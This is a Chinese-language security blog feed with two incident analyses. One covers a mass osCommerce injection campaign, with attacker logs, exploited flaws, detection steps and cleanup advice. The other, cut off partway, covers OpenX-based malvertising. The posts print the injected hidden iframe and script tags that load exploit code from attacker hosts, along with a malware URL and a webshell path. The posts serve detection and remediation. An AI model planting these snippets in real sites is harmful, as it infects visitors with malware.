tag:blogger.com,1999:blog-14417594311407006762011-08-21T09:22:29.214+08:00阿碼外傳-阿碼科技非官方中文 Blog源碼檢測、靜態分析、白箱測試、黑箱測試、滲透測試、軟體安全、程式漏洞、資訊安全、Web安全、OWASP Top 10、SANS Top 20、資安趨勢、0-day、惡意程式、網站掛馬、駭客手法、攻擊手法、各地駭客年會、資安會議、駭客介紹、web application firewall (WAF)、應用程式防火牆、資安新聞、掛馬檢測、掛馬分析、黑客研究、大規模掛馬攻擊研究、路徑安全Wayne Huangnoreply@blogger.comBlogger106125blogspot/armorize_chthttp://feedburner.google.comSubscribe with My Yahoo!Subscribe with NewsGatorSubscribe with BloglinesSubscribe with NetvibesSubscribe with GoogleSubscribe with PageflakesSubscribe with PlusmoSubscribe with FeedLoungeSubscribe with The Free DictionarySubscribe with Bitty BrowserSubscribe with Live.comSubscribe with Excite MIXSubscribe with Yourminis.comSubscribe with Attensa for OutlookSubscribe with WebwagSubscribe with netomat HubSubscribe with Daily RotationSubscribe with Podcast ReadySubscribe with FlurrySubscribe with ParticlsAdd to Any Feed ReaderSubscribe with fwickitag:blogger.com,1999:blog-1441759431140700676.post-56598410401520939792011-08-19T11:04:00.000+08:002011-08-19T11:04:28.310+08:002011-08-19T11:04:28.310+08:00willysy.com 針對osCommerce網站進行大規模感染,超過八百萬個網頁遭受感染(作者: Wayne Huang, Chris Hsiao, NightCola Lin, Sun Huang, Fyodor Yarochkin, Crane Ku)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-bs4fVwwf79Q/TkCQO5YcqgI/AAAAAAAACaY/ZI9hP_7U3L4/s1600/willysy_mass_oscommerce_infection_willysy_7M.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://2.bp.blogspot.com/-bs4fVwwf79Q/TkCQO5YcqgI/AAAAAAAACaY/ZI9hP_7U3L4/s1600/willysy_mass_oscommerce_infection_willysy_7M.png" /></a></div><b>[大綱]</b><br />
<a href="#summary">1. 摘要</a><br />
<a href="#timeline">2. 攻擊時間表</a><br />
<a href="#source">3. 攻擊來源</a><br />
<a href="#vulnerability">4. 針對的弱點</a><br />
<a href="#what_is_done">5. 受感染網站的症狀</a><br />
<a href="#remediation">6. 檢測及清除</a><br />
<a href="#details">7. 感染細節</a><br />
<a href="#screenshots">8. 相關截圖</a><br />
<a href="#comment">9. 後續補充</a><br />
<span class="fullpost"><br />
<a name="summary"><b>[1. 摘要]</b></a><br />
1. 感染數量: <br />
在8月3日時,Google 的搜尋結果顯示超過了<b><a href="http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=%22http://willysy.com/images/banners/%22&hl=en#q=%22http://willysy.com/images/banners/%22&hl=en&prmd=ivns&ei=F-81Tv2iB6_5mAWh3azwCg&start=90&sa=N&bav=on.2,or.r_gc.r_pw.&fp=d31248080af7dd23&biw=734&bih=475">7,690,000 (willysy)</a> + <a href="http://www.google.com/search?q=%22%3Cscript+src%3Dhttp://exero.eu/catalog/jquery.js%22&hl=en&prmd=ivns&ei=LjE6TqP0OMWfmQXtoqC8Bw&start=90&sa=N&biw=814&bih=696">629,000 (exero)</a> = 8,300,000 被感染的網頁 (八百多萬個)</b>。 此數量指的是被感染的網頁數量,並不是指網站或網域。<br />
<br />
2. 感染的iframe如下:<br />
一開始的型式:<br />
<pre class="brush: html; auto-links: false"><iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
</pre>隨後衍變為:<br />
<pre class="brush: html; auto-links: false"><script src=http://exero.eu/catalog/jquery.js></script>
</pre><br />
3. 攻擊者:<br />
來自烏克蘭的ip: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214 (都是 AS47694)。Agent 字串: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"<br />
<br />
4. 攻擊目標與相應漏洞:<br />
攻擊目標為有使用 osCommerce 的網站,所使用的漏洞: <a href="http://www.1337day.com/exploits/16505">osCommerce Remote Edit Site Info Vulnerability</a>,<a href="http://www.exploit-db.com/exploits/17285/">osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability</a>,及 <a href="http://www.exploit-db.com/exploits/12801/">Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass</a>。<br />
<br />
5. 所插入的惡意連結中會針對以下漏洞攻擊網站瀏覽者:<br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840">CVE-2010-0840</a> -- Java Trust<br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188">CVE-2010-0188</a> –- PDF LibTiff<br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886">CVE-2010-0886</a> -– Java SMB<br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003">CVE-2006-0003</a> -– IE MDAC<br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885">CVE-2010-1885</a> – HCP<br />
<br />
6. 執行攻擊碼的網域:<br />
arhyv.ru,counv.ru<br />
註冊日期: July 20th<br />
註冊者: leshkinaira@yahoo.com<br />
IP: 46.16.240.18 (AS51632 烏克蘭 - Inet Ltd)<br />
相關網域: xlamv.ru,vntum.ru<br />
<br />
7. 惡意程式網址:<br />
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot<br />
<br />
<a name="timeline"><b>[2. 攻擊時間表]</b></a><br />
<br />
<b>7月10日</b> -- "Angel Injection" 寫了一篇關於 "osCommerce Remote Edit Site Info Vulnerability" (osCommerce 網站可被遠端編輯資訊之弱點) (<a href="http://www.exploit-id.com/web-applications/oscommerce-remote-edit-site-info-vulnerability">這裡</a>,<a href="http://www.1337day.com/exploits/16505">這裡</a>)。<br />
<br />
<b>7月11日</b> -- 攻擊團隊開始測試該項漏洞。<br />
<pre class="brush: html; auto-links: false">178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com/admin/configuration.php/login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
</pre><br />
<b>7月20日</b> -- 攻擊者註冊了 arhyv.ru 及 counv.ru 網域,所使用的email: leshkinaira@yahoo.com<br />
<br />
<b>7月23日</b> -- 針對 "Store Name" 這個變數發動攻擊:<br />
<pre class="brush: html; auto-links: false">178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
</pre><br />
插入的iframe由一開始的:<br />
<pre class="brush: html; auto-links: false"><iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
</pre>爾後演變為:<br />
<pre class="brush: html; auto-links: false"><script src=http://exero.eu/catalog/jquery.js></script>
</pre><br />
<b>7月24日</b> -- 為我們一開始分析這個事件的時間點,一開始Google顯示只有90,000個網頁被感染:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-t6xOIbHheFg/Ti2l0VwhpOI/AAAAAAAACYA/ANmRS-FsE4g/s1600/willysy_drive_by_download_mass_injection_google_ie6_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-t6xOIbHheFg/Ti2l0VwhpOI/AAAAAAAACYA/ANmRS-FsE4g/s1600/willysy_drive_by_download_mass_injection_google_ie6_2.png" /></a></div><br />
<b>7月31日</b> -- <a href="http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=%22http://willysy.com/images/banners/%22&hl=en#q=%22http://willysy.com/images/banners/%22&hl=en&prmd=ivns&ei=F-81Tv2iB6_5mAWh3azwCg&start=90&sa=N&bav=on.2,or.r_gc.r_pw.&fp=d31248080af7dd23&biw=734&bih=475">Google 顯示</a> 超過 <b>3,410,000 (willysy) + 386,000 (exero) = 3,800,000 (三百多萬) 網頁有遭受感染</b>。<br />
另一方面,Bing <a href="http://www.bing.com/search?q=%22http%3A%2F%2Fwillysy.com%2Fimages%2Fbanners%2F%22&go=&qs=n&sk=&form=QBLH">顯示</a> 有 1,800,000 (一百多萬) 個網頁有被 willysy.com 感染:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ecdvEdBvgPk/TjX_7-XnCaI/AAAAAAAACZg/QGQg97Atxp0/s1600/willysy_drive_by_download_mass_injection_bing_1_8_million.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://2.bp.blogspot.com/-ecdvEdBvgPk/TjX_7-XnCaI/AAAAAAAACZg/QGQg97Atxp0/s1600/willysy_drive_by_download_mass_injection_bing_1_8_million.png" /></a></div><br />
<b>8月3日</b> -- Google 顯示超過了 5,820,000 (willysy) + 497,000 (exero) = 6,300,000 (六百多萬) 的網頁有遭受到感染<br />
<br />
<b>8月7日</b> -- Google 顯示超過了 <b><a href="http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=%22http://willysy.com/images/banners/%22&hl=en#q=%22http://willysy.com/images/banners/%22&hl=en&prmd=ivns&ei=F-81Tv2iB6_5mAWh3azwCg&start=90&sa=N&bav=on.2,or.r_gc.r_pw.&fp=d31248080af7dd23&biw=734&bih=475">7,690,000 (willysy)</a> + <a href="http://www.google.com/search?q=%22%3Cscript+src%3Dhttp://exero.eu/catalog/jquery.js%22&hl=en&prmd=ivns&ei=LjE6TqP0OMWfmQXtoqC8Bw&start=90&sa=N&biw=814&bih=696">629,000 (exero)</a> = 8,300,000 (八百多萬) 個網頁遭受感染</b>。<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-bs4fVwwf79Q/TkCQO5YcqgI/AAAAAAAACaY/ZI9hP_7U3L4/s1600/willysy_mass_oscommerce_infection_willysy_7M.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://2.bp.blogspot.com/-bs4fVwwf79Q/TkCQO5YcqgI/AAAAAAAACaY/ZI9hP_7U3L4/s1600/willysy_mass_oscommerce_infection_willysy_7M.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-UR5Dc4Q7VoI/TkCQPF24JqI/AAAAAAAACag/HRWI0ZttQvE/s1600/willysy_mass_oscommerce_infection_exero_600K.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://3.bp.blogspot.com/-UR5Dc4Q7VoI/TkCQPF24JqI/AAAAAAAACag/HRWI0ZttQvE/s1600/willysy_mass_oscommerce_infection_exero_600K.png" /></a></div><a name="source"><b>[3. 攻擊來源]</b></a><br />
<br />
有許多IPs 已經被認定是這次事件的攻擊者: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214 (這些都屬於 AS47694)。這些IPs 都來自烏克蘭,且屬於ISP: www.didan.com.ua。<br />
<br />
攻擊者使用了以下的User-Agent 字串:<br />
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)<br />
<br />
如果你有 log 或者其他攻擊來源可以分享的,請連絡我們。(wayne@armorize.com)<br />
<br />
<a name="vulnerability"><b>[4. 針對的弱點]</b></a><br />
<br />
這波攻擊鎖定了使用osCommerce 架設的網站,利用了許多 osCommerce 已知的漏洞,包含: <a href="http://www.1337day.com/exploits/16505">osCommerce Remote Edit Site Info Vulnerability</a> (於 2011/7/10 公開),<a href="http://www.exploit-db.com/exploits/17285/">osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability</a> (於 2011/5/14公開),及 <a href="http://www.exploit-db.com/exploits/12801/">Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass</a> (於2010/5/30 公開)。<br />
<br />
以下為部份 log 樣本:<br />
<pre class="brush: html; auto-links: false">178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:07 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 21883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.71 - - [23/Jul/2011:19:55:37 -0500] "GET /admin/configuration.php/login.php?cID=1&action=edit HTTP/1.1" 200 25014 "http://__Masked__by_armorize.com/admin/configuration.php?cID=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
</pre><br />
<a name="what_is_done"><b>[5. 受感染網站的症狀]</b></a><br />
<br />
1. 網站中 osCommerce 的 "Store Name" 變數會被插入以下一種程式碼:<br />
<pre class="brush: html; auto-links: false"><iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
</pre><pre class="brush: html; auto-links: false"><script src=http://exero.eu/catalog/jquery.js></script>
</pre>2. 攻擊者大部份會留下至少一個 (有時候會更多個) 的後門 (或稱之為 "webshells")。這個在 share hosting 網站上更常發生,因為後門程式可以存取在相同機器上,其他網站的資料:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-3qmOCdnX01o/TjTt2r7hLyI/AAAAAAAACZA/auk4ebbVVYE/s1600/willysy_drive_by_download_mass_injection_backdoor1.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://2.bp.blogspot.com/-3qmOCdnX01o/TjTt2r7hLyI/AAAAAAAACZA/auk4ebbVVYE/s1600/willysy_drive_by_download_mass_injection_backdoor1.png" /></a></div><br />
<a name="remediation"><b>[6. 檢測及清除]</b></a><br />
<br />
以下為我們建議檢測及清除的流程。如果你有任何疑問或者需要我們幫你檢測,請連絡我們 (wayne@armorize.com)。<br />
<br />
1. 檢查是否受到感染。<br />
<br />
1.1 搜尋 logs 查看有無以下情形:<br />
1.1.1 來自以下IPs的存取: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214。<br />
1.1.2 透過以下 agent 字串進行存取: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)<br />
<br />
1.2 搜尋你的網站查看有無以下程式碼:<br />
<pre class="brush: html; auto-links: false"><iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
</pre><pre class="brush: html; auto-links: false"><script src=http://exero.eu/catalog/jquery.js></script>
</pre><br />
1.3 或者直接透過 <a href="https://hackalert.armorize.com/">HackAlert</a> 幫你進行檢測。<br />
<br />
2. 在你用來管理網站的電腦上安裝防毒軟體。<br />
<br />
3. 找尋及清除存在的後門。<br />
<br />
4. 找尋及清除感染進來的惡意程式碼。<br />
<br />
5. 將你的 osCommerce 升到最新版,同時使用 .htaccess 來保護管理者資料夾。<br />
<br />
6. 更換相關密碼 (包括你的 hosting 管裡介面及osCommerce中管理員的密碼)<br />
<br />
一個很好的文章,教我們如何讓 osCommerce 更安全:(感謝 Markus 提供):<br />
<br />
<a href="http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/">http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/</a><br />
<br />
最新版的 osCommerce 可以在這邊下載:<br />
<br />
<a href="http://www.oscommerce.com/solutions/downloads">http://www.oscommerce.com/solutions/downloads</a><br />
<br />
<a name="details"><b>[7. 感染細節]</b></a><br />
<br />
<a href="http://www.youtube.com/watch?v=okAIMflJ4bA&feature=mfu_in_order&list=UL">這部</a>影片錄下整個感染流程,在我們錄的時候,僅有 90,000 的網頁被感染。<br />
<br />
而以下是我們新錄製的,此時已經有超過六百萬的網頁被感染:<br />
<iframe height="468" width="750" src="http://www.youtube.com/embed/1Jh_H4qQzqo" frameborder="0" allowfullscreen></iframe><br />
1. 受感染的網站被插入以下一種惡意程式碼:<br />
<pre class="brush: html; auto-links: false"><iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
</pre><pre class="brush: html; auto-links: false"><script src=http://exero.eu/catalog/jquery.js></script>
</pre><br />
2. 瀏覽器在載入 http://willysy.com/images/banners/ 時,會重導(http 302)到 http://papucky.eu/ext/<br />
<br />
3. papucky.eu/ext/ 的內容 <a href="http://pastebin.com/E8c6tRsH">在這裡 (pastebin)</a>,會去載入 http://gooqlepics.com/include.js?in=864 裡面的 javascript<br />
<br />
4. <a href="http://pastebin.com/2DrkMR5b">Javascript 在這裡 (pastebin)</a>,<a href="http://pastebin.com/R8HMMQDE">解開混碼後</a>,會產生一個iframe指向:<br />
<br />
http://yandekapi.com/api?in=864<br />
<br />
5. http://yandekapi.com/api?in=864 的內容 <a href="http://pastebin.com/SQUrjeDH">在這裡</a>,會重導到: http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV<br />
<br />
6. http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV 的內容 <a href="http://pastebin.com/ttQtvtF2">在這裡</a>,解開混碼後,可以看到<a href="http://pastebin.com/jAPCwSz8">原始攻擊碼</a>,這個攻擊碼同時攻擊了多個漏洞。<br />
<br />
7. 漏洞成功執行後,瀏覽器會下載以下這隻惡意程式並且執行:<br />
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot<br />
<br />
<a name="screenshots"><b>[8. 相關截圖]</b></a><br />
<br />
具有弱點的 osCommerce 網站允許使用者不需要管理者權限就可以存取及修改變數資訊:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-o_vSmieRqjg/TjT80DrW8jI/AAAAAAAACZI/hppnPEx824c/s1600/willysy_drive_by_download_mass_injection_oscommerce_vuln1.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://1.bp.blogspot.com/-o_vSmieRqjg/TjT80DrW8jI/AAAAAAAACZI/hppnPEx824c/s1600/willysy_drive_by_download_mass_injection_oscommerce_vuln1.png" /></a></div>以下為部份被攻擊網站的截圖,請注意title的部份,都有被插入惡意程式碼,這是因為 osCommerce 預設會將 STORE_NAME 這個部份做為 title 來進行顯示 (顯示在title部份的惡意程式碼並不會被執行,因為他被當做是title內容來顯示,值得注意的是,這個STORE_NAME並不是只有用在title部份而已,在其他部份的情況下則會被正確執行):<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Dq3BnwEGM7s/Ti3iOJT088I/AAAAAAAACYI/BGIUpEgAkmI/s1600/willysy_oscommerce_hacked_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-Dq3BnwEGM7s/Ti3iOJT088I/AAAAAAAACYI/BGIUpEgAkmI/s1600/willysy_oscommerce_hacked_1.png" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-h6OFWuGD5tk/Ti3iOQKelzI/AAAAAAAACYQ/1dB7tt5H5Go/s1600/willysy_oscommerce_hacked_2.png.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-h6OFWuGD5tk/Ti3iOQKelzI/AAAAAAAACYQ/1dB7tt5H5Go/s1600/willysy_oscommerce_hacked_2.png.png" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-id6xa68VXKM/Ti3iOumlonI/AAAAAAAACYY/ktisO8XH_Fw/s1600/willysy_oscommerce_hacked_3.png.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-id6xa68VXKM/Ti3iOumlonI/AAAAAAAACYY/ktisO8XH_Fw/s1600/willysy_oscommerce_hacked_3.png.png" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-lx9eG7KHqxs/Ti3iOwno4PI/AAAAAAAACYg/lkPlUm9Q9hE/s1600/willysy_oscommerce_hacked_4.png.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-lx9eG7KHqxs/Ti3iOwno4PI/AAAAAAAACYg/lkPlUm9Q9hE/s1600/willysy_oscommerce_hacked_4.png.png" /></a></div><br />
<a name="comment"><b>[9. 後續補充]</b></a><br />
<br />
截至目前(8月19)為止,除了原本兩種惡意程式碼之外,我們有發現到新的 pattern (透過一樣的漏洞插入的):<br />
原本的: <br />
<pre class="brush: html; auto-links: false"><iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
</pre><pre class="brush: html; auto-links: false"><script src=http://exero.eu/catalog/jquery.js></script>
</pre><br />
持續觀察到的:<br />
<pre class="brush: html; auto-links: false"><iframe src="http://derryastros.com/images/1/go.php" width="0" height="0" frameborder="0"></iframe>
</pre><pre class="brush: html; auto-links: false"><script src=http://lamacom.net/images/j/></script>
</pre></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-5659841040152093979?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=OZXqtqsvCQc:9mWRT46Z4L0:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=OZXqtqsvCQc:9mWRT46Z4L0:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=OZXqtqsvCQc:9mWRT46Z4L0:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=OZXqtqsvCQc:9mWRT46Z4L0:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/OZXqtqsvCQc" height="1" width="1"/>Colanoreply@blogger.com0http://armorize-cht.blogspot.com/2011/08/willysycom-oscommerce.htmltag:blogger.com,1999:blog-1441759431140700676.post-21743275672010769052011-07-27T02:28:00.001+08:002011-07-27T02:36:37.134+08:002011-07-27T02:36:37.134+08:00OpenX.org上的插件具有漏洞,導致 dyndns 團隊侵入網站並且透過惡意廣告的手法散佈偽冒的防毒軟體:Personal Shield Pro(作者: Wayne Huang, Chris Hsiao, Sun Huang, NightCola Lin, Fyodor Yarochkin)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-CUOAb5f1kgE/ThIiRDJ-mAI/AAAAAAAACUA/guj25uRRSSE/s1600/openx_malvertising_personal_shield_pro.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://3.bp.blogspot.com/-CUOAb5f1kgE/ThIiRDJ-mAI/AAAAAAAACUA/guj25uRRSSE/s1600/openx_malvertising_personal_shield_pro.png" /></a></div>目錄:<br />
<a href="#summary">[1. 摘要]</a><br />
<a href="#infection">[2. 感染過程]</a><br />
<a href="#openx">[3. OpenX的漏洞]</a><br />
<a href="#attack">[4. 攻擊方式]</a><br />
<a href="#patch">[5. 如何修補網站]</a><br />
<a href="#exploitpack">[6. Exploit Pack]</a><br />
<a href="#randomization">[7. 變動的惡意網域]</a><br />
<a href="#php_filename">[8. 亂數產生的PHP檔名?]</a><br />
<a href="#dyndns">[9. "dyndns" 團隊]</a><br />
<a href="#list">[10. 被感染的網站列表]</a><br />
<br />
<a name="summary"><b>[1. 摘要]</b></a><br />
<br />
<b>影響:</b> 瀏覽者瀏覽了受感染的網站將導致電腦被裝上 "Personal Shield Pro" 這套"偽"防毒軟體。<br />
<b>起因:</b> 在<a href="http://www.blogger.com/post-create.g?blogID=505418663478597283">OpenX</a>官方網站上<a href="https://developer.openx.org/wiki/download/attachments/16155845/openXVideoAds.zip">提供</a>了具有漏洞的插件。<br />
<b>Exploit pack:</b> 本次事件中所使用的是 g01pack exploit pack。<br />
<b>攻擊團隊:</b> 在內部我們稱之為 "dyndns" 團隊,此團隊也涉及我們在五月多針對Clicksor事件的報導,在更早之前也與其他類型的網頁惡意程式事件有關。<br />
<b>被感染的網站列表:</b><br />
theastrologer.com<br />
bancadellecase.com<br />
thrillldrillls.com<br />
luckymoving.com<br />
fastodds.com<br />
mediabooks.com<br />
dfonline.jp<br />
dailynews.co.za<br />
perefoorum.ee<br />
sasites.co.za<br />
abmotor.pt<br />
medical-tribune.co.jp<br />
diamondcard.it<br />
adrenal-fatigue.de<br />
allergien-behandeln.de<br />
rhr.ru<br />
kuku.ee<br />
handwerkermarkt.de<br />
<br />
<a name="infection"><b>[2. 感染過程]</b></a><br />
<br />
從2009年開始,GMO與阿碼科技便在日本部署了網頁掛馬監控服務平臺,而我們也一直致力於研究網頁惡意程式的威脅。<br />
<br />
從今年五月開始,我們就鎖定了一個團隊:"dyndns"。在五月中旬時,我們報導了一篇:<a href="http://armorize-cht.blogspot.com/2011/05/clicksor_16.html">超過一半以上的惡意廣告來自Clicksor</a>,該事件也與此團體有關。<br />
<br />
而在該篇報導不久之後,此團體即開始攻擊有使用 <a href="http://www.openx.org/">OpenX</a> 來提供廣告功能的網站。瀏覽者一旦瀏覽了被感染的網站,電腦就會被安裝上偽裝的防毒軟體 (普遍稱之為<a href="http://en.wikipedia.org/wiki/Ransomware_(malware)">流氓軟體</a>)。此軟體會取消系統絕大部份的功能,並且透過此現象來讓瀏覽者認為自己的電腦真的中毒。之後此軟體會告訴瀏覽者,解決的方法就是去購買這一套 "流氓軟體",在購買之後,瀏覽者便等同於將自己的信用卡卡號洩露出去。<br />
<br />
以下是一部當瀏覽者瀏覽了此類型網站時所產生的結果 (此網站位於日本,為實際上被感染的網站):<br />
<iframe width="750" height = "468" src="http://www.youtube.com/embed/MeyCTBlI81w" frameborder="0" allowfullscreen></iframe><br />
<span class="fullpost"><br />
<a name="openx"><b>[3. OpenX的漏洞]</b></a><br />
<br />
所有被感染的網站都有一個共通的特性:都安裝了OpenX來提供廣告,其中有些使用的還是最新的版本-2.8.7。此事件中被感染的OpenX檔案大部份是ajs.php,下面為一個完整的URL範例:<br />
<pre class="brush: html; auto-links: false">http://www.theastrologer.com/openx/www/delivery/ajs.php?zoneid=3&cb=4021406622&charset=utf-8&loc=http%3A//theastrologer.com/
</pre>為什麼即使安裝了最新版的OpenX 還是會被入侵呢?為了解開這個原因,我們再進一步的追蹤下去。如同你們所見,在被感染的網站(bancadellecase.it)中,有一隻webshell:<br />
<br />
http://bancadellecase.it/admin/banner/www/admin/plugins/videoReport/lib/tmp-upload-images/image.php<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-CETxGYIu7t0/ThJvTI9cxGI/AAAAAAAACUI/LncNa3huLTQ/s1600/openx_hacked_webshell_malvertising.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://1.bp.blogspot.com/-CETxGYIu7t0/ThJvTI9cxGI/AAAAAAAACUI/LncNa3huLTQ/s1600/openx_hacked_webshell_malvertising.png" /></a></div>Webshell是一個後門程式,允許攻擊者完全掌控被入侵的網站。<br />
<br />
往Webshell存在路徑的上一層走去,我們可以看到有許許多多的檔案,每一個檔案就代表著每次使用者嘗試上傳的記錄:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-hzwf8cwnDJI/ThJwI4eLeII/AAAAAAAACUQ/35rYoG8mP2g/s1600/openx_hacked_webshell_malvertising_personal_shield_pro.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" src="http://3.bp.blogspot.com/-hzwf8cwnDJI/ThJwI4eLeII/AAAAAAAACUQ/35rYoG8mP2g/s1600/openx_hacked_webshell_malvertising_personal_shield_pro.png" /></a></div><br />
第一個成功的上傳我們可以發現到是在六月26日,而從圖中我們可以發現一個明顯的情況:在攻擊者成功上傳了webshell後,他便隨即將目錄的存取權限限制起來,此行為導致之後的上傳行為都失效。<br />
<br />
